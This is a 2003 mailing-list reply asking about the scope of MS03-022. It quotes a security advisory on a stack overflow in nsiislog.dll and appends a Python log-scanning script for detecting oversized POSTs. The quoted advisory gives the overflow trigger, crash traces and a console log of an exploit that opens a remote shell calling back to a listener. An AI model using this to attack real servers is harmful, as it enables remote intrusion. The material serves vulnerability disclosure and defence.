Re: Windows Media Services Remote Command Execution #2
From: Jim Winchell (jcwinchell_at_AOL.COM)
Date: 06/26/03
- Previous message: Brad Corob: "MS03-021 (819639) Patch Misinformation"
- Next in thread: Brett Moore: "Re: Windows Media Services Remote Command Execution #2"
- Reply: Brett Moore: "Re: Windows Media Services Remote Command Execution #2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 26 Jun 2003 11:03:01 -0400
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Windows Media Server doesn't require IIS to be installed. IIS can be installed on the same machine, but in that case either Windows Media or IIS has to be configured to use a different port for HTTP, since they can't both share port 80.
Windows Media uses its own built-in web server (Cougar) for streaming HTTP traffic rather than IIS. If IIS isn't installed, the /scripts directory doesn't exist and nsiislog.dll is instead installed in %windir%\system32\Windows Media\Server.
Can you confirm whether or not this affects Windows Media Servers that aren't running IIS, or can nsiislog.dll still be exploited?
Thanks,
Jim Winchell
Brett Moore wrote:
> ========================================================================
> = Windows Media Services Remote Command Execution #2
> =
> = brett.moore@security-assessment.com
> = http://www.security-assessment.com
> =
> = MS Bulletin posted: June 25, 2003
> = http://www.microsoft.com/technet/security/bulletin/MS03-022.asp
> =
> = Affected Software:
> = Microsoft Windows 2000
> =
> = Public disclosure on June 25, 2003
> =========================================================================
> = Our Rating: Due to the ease of exploitation of this vulnerability and
> = the fact that it allows command execution against a vulnerable server
> = we feel that this patch is CRITICAL for all servers that have the
> = vulnerable dll installed even if Windows Media Services are not in use.
> =========================================================================
>
> A short time after a long time ago, in a place very similar to the last,
> where the sun shines, the snow falls and the water is still clean....
>
> Continuing with our 'Methodical Approach To Finding Overflows' against
> nsiislog.dll we discovered another issue but due to complications this
> fix was not released with the previous nsiislog.dll bulletin.
>
> == MS03-022 states ==
> Impact of vulnerability: Allow an attacker to execute code of their choice
> Maximum Severity Rating: Important
>
> There is a flaw in the way nsiislog.dll processes incoming client requests.
> A vulnerability exists because an attacker could send a specially formed HTTP
> request (communications) to the server that could cause IIS to fail or
> execute code on the user's system.
> == MS03-022 ==
>
> == Description ==
>
> Sending a large standard post to nsiislog.dll will cause an access
> violation resulting in the following error log.
>
> ------------------------------------------------------------------------
> Event Type: Warning
> Event Source: W3SVC
> Event Category: None
> Event ID: 37
> Description:
> Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly.
> ------------------------------------------------------------------------
>
> This results in a standard stack based overflow, resulting in EIP
> being set to an arbitrary value allowing for remote command execution
> with privileges associated with the IWAM_machinename account.
>
> == Standard HTTP Post ==
>
> POST /scripts/nsiislog.dll HTTP/1.1
> content-length: <postlength>
>
> <post data>
>
> Using Size: 4354
> Connecting....Sending Buffer....
> 78028E9F mov al,byte ptr [esi] ESI = 00B138B4
>
> Using Size: 5000
> Connecting....Sending Buffer....
> 40F01F3B repne scas byte ptr [edi] EDI = 58585858
>
> Using Size: 25000
> Connecting....Sending Buffer....
> 78005994 mov dword ptr [edi],edx EDX = 58585858
> -
> 58585858 ??? illegal op EIP = 58585858
>
> == Exploitation ==
>
> Commonly referred to as a stack based overflow, control is taken when the
> EIP is set to a value from the stack. Widely known and easily exploitable
> by using a call or jmp instruction or in the worst case a brute force
> technique of direct jumps.
>
> In this case control is taken when a value is obtained from the stack
> and then used in a direct call.
>
> 77FB98E1 mov ecx,dword ptr [ebp+18h]
> 77FB98E4 call ecx
>
> == Exploit Example ==
>
> %:\>exploit 192.168.1.63
> ** IISNSLOG.DLL - Remote Shell **
>
> . Calling Home: blackhole:2000
> . Shellcode Size: 322 bytes
> . Preparing Exploit Buffer......Ready
> . Starting Listener On Port: 2000
> . Connecting To Target
> . Sending Exploit......Exploit Sent
> . Connection Received
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-2000 Microsoft Corp.
> C:\WINNT\system32>whoami
> IWAM_BLACKHOLE
> C:\WINNT\system32>
>
> == Solutions ==
>
> - Every day is a 0-day day on the Internet. Limiting the avenues of attack
> can be a key factor in reducing the risk to a web server. Programs such
> as secureIIS and URLscan should be set up to reduce the number of methods
> that can be used to send data to a server. Removing unnecessary services,
> files and ISAPI extensions reduces the number of listeners that data can
> be fed to, limiting the number of vulnerabilities that a server is
> susceptible to.
> - Install the vendor supplied patch.
>
> == Credit ==
>
> Discovered and advised to Microsoft January 30, 2003 by Brett Moore of
> Security-Assessment.com
>
> %-) viva Las Vegas!!
>
> == About Security-Assessment.com ==
>
> Security-Assessment.com is a leader in intrusion testing and security
> code review, and leads the world with SA-ISO, online ISO17799 compliance
> management solution. Security-Assessment.com is committed to security
> research and development, and its team have previously identified a
> number of vulnerabilities in public and private software vendors products.
>
> oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
> Are You "Certifiable"? Summer's Hottest Certification Just Got HOTTER!
>
> With a growth rate exceeding 110%, the TICSA security practitioner
> certification is one of the hottest IT credentials available. And now, for
> a limited time, you can save 33% off of the TICSA certification exam! To
> learn more about the TICSA certification, and to register as a TICSA
> candidate online, just go to
>
> http://www.trusecure.com/offer/s0100/
>
> oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
>
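The quoted advisory's Description section says the fault is triggered by a large standard POST to nsiislog.dll (the probes shown start at 4354 bytes), and its Solutions section recommends limiting the methods and data that can reach the server. The following script is an added example, not code from Brett Moore, Security-Assessment.com or Microsoft: it parses IIS W3C extended log lines and flags POST requests to nsiislog.dll whose received byte count (cs-bytes) exceeds a threshold, which is the kind of check an administrator could run over existing logs to see whether such requests have already been arriving. The log lines, client addresses and sizes are constructed for the example, and the 4096-byte threshold is an assumption chosen to sit below the smallest probe size in the advisory; the names parse_w3c, find_oversized_posts and DEFAULT_MAX_POST_BYTES are hypothetical.

```python
"""Flag oversized POST requests to nsiislog.dll in IIS W3C extended logs.

Added illustration for the MS03-022 advisory thread; not code from the
advisory's authors or from Microsoft.
"""

from typing import Dict, Iterator, List

# Constructed sample log in IIS W3C extended format with the optional
# "Bytes Received" (cs-bytes) field enabled. Every value here is made up.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-06-26 15:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes
2003-06-26 15:00:01 192.168.1.10 GET /default.htm - 200 310
2003-06-26 15:00:05 192.168.1.10 POST /scripts/nsiislog.dll - 200 412
2003-06-26 15:00:09 10.0.0.7 POST /scripts/nsiislog.dll - 500 25217
2003-06-26 15:00:12 10.0.0.7 POST /scripts/nsiislog.dll - 500 5210
2003-06-26 15:00:20 192.168.1.22 GET /scripts/nsiislog.dll - 200 255
"""

# Assumption: the advisory shows faults from a 4354-byte post, so this
# example treats anything above 4096 bytes as worth a look. Tune the value
# against the sizes that legitimate Windows Media client log submissions
# produce on your own servers.
DEFAULT_MAX_POST_BYTES = 4096
TARGET_ISAPI = "nsiislog.dll"


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the names in #Fields."""
    fields: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            # The directive defines the column layout for the lines after it.
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue  # #Software, #Version, #Date and similar directives
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # no layout yet, or a malformed line: skip rather than guess
        yield dict(zip(fields, values))


def find_oversized_posts(text: str,
                         max_post_bytes: int = DEFAULT_MAX_POST_BYTES) -> List[Dict[str, object]]:
    """Return POSTs to nsiislog.dll whose received size exceeds the threshold."""
    hits: List[Dict[str, object]] = []
    for rec in parse_w3c(text):
        if rec.get("cs-method", "").upper() != "POST":
            continue
        if not rec.get("cs-uri-stem", "").lower().endswith(TARGET_ISAPI):
            continue
        try:
            received = int(rec.get("cs-bytes", ""))
        except ValueError:
            continue  # cs-bytes is "-" when the size was not recorded
        if received > max_post_bytes:
            hits.append({
                "time": f"{rec['date']} {rec['time']}",
                "client": rec["c-ip"],
                "status": rec["sc-status"],
                "bytes": received,
            })
    return hits


if __name__ == "__main__":
    for hit in find_oversized_posts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} POST {TARGET_ISAPI} "
              f"{hit['bytes']} bytes (status {hit['status']})")
```

Two caveats apply when using this against real logs. First, cs-bytes is not logged unless "Bytes Received" is selected under the site's extended logging properties, so the check silently skips records where the field is absent or "-". Second, a flagged request is only a lead: a 500 status on such a POST, especially alongside the W3SVC Event ID 37 entry quoted in the advisory, is the pattern that should prompt a look at whether the patch has been applied and whether nsiislog.dll needs to be reachable from that client at all.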